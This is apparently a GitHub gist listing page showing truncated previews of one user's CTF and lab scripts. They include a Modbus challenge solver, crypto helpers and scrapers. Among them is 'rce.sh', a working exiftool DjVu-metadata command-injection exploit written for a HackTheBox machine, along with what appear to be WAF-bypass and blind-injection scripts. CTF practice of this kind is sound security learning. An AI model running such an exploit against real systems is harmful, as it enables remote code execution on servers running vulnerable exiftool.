Skip to content

Instantly share code, notes, and snippets.

View xl00t's full-sized avatar

xl00t

23 followers · 119 following
View GitHub Profile
@xl00t
xl00t / myges.py
Created December 5, 2021 07:02
Play with myges API
#!/usr/bin/env python3
import requests
from urllib.parse import urlsplit, parse_qs
import base64
import time
class MYGES:
def __init__(self, username, password):
@xl00t
xl00t / rce.sh
Last active May 8, 2022 15:52
meta.htb exiftool RCE
#!/usr/bin/env bash
while true; do
read -p "> " userinput
if [[ "$userinput" =~ "exit" ]]; then exit; fi
payload="(metadata \"\\c\${system('rm uploads/*.jpg;echo dfff0a70fa1a55c8c1a4966c19f6da452 ; $userinput ; echo dfff0a70fa1a55c8c1a4966c19f6da452')};\")"
echo $payload > payload
bzz payload payload.bzz
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
exiftool -config configfile '-HasselbladExif<=exploit.djvu' hacker.jpg 1> /dev/null
@xl00t
xl00t / skynet.py
Created January 28, 2022 00:51
Time Based Obfuscation
import requests
import time
import string
TIMEOUT = 10
def waf_bypass(payload):
return "||".join([f"'{c}'" for c in payload])
def peek(substring):
substring = substring.strip()
@xl00t
xl00t / max-array-1.asm
Last active May 8, 2022 15:51
.386
.model flat
.data
array DWORD 7,8,9,0,64,10,0,147,14
.code
main proc
xor ecx, ecx
@xl00t
xl00t / readme.md
Last active April 17, 2022 16:21
THCon 2022 | Secure Cloud
@xl00t
xl00t / ColorPlant.py
Created May 6, 2022 10:40
FCSC 2022 - MISC - Color Plant 2/2
from pymodbus.client.sync import ModbusTcpClient
UNIT = 1
R = {"to_fill": 32, "valve_id": 0, "regu_id": 32}
G = {"to_fill": 126, "valve_id": 1, "regu_id": 33}
B = {"to_fill": 42, "valve_id": 2, "regu_id": 34}
MAX = 255
M = {"register_id": 6, "max": 100}
F = {"register_id": 10, "max": 200}
@xl00t
xl00t / root-me.py
Created May 12, 2022 15:05
root-me.py
import requests
from bs4 import BeautifulSoup
import re
URL = "https://www.root-me.org/"
GRADES = {
"visitor": 100,
"curious": 500,
"trainee": 2017,
"insider": 3535,
@xl00t
xl00t / HerVIP1.py
Created May 29, 2022 21:10
HerVIP1.py
#!/usr/bin/env python3
import requests
import string
import time
import sys
import random
import string
'''
table :
- users :
@xl00t
xl00t / cbc.py
Created June 13, 2022 03:17
#!/usr/bin/env python3
import json
import os
import sys
import re
import binascii
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad,unpad
BLOCK_SIZE = 16
@xl00t
xl00t / myxor.py
Created October 21, 2022 20:46
Xor little tool to play with XOR encryption
#!/usr/bin/env python3
import base64
import argparse
import string
class XorBreak:
def __init__(self, clear, ciphertext, key, cribs):
self.clear = clear
self.ciphertext = ciphertext
self.key = key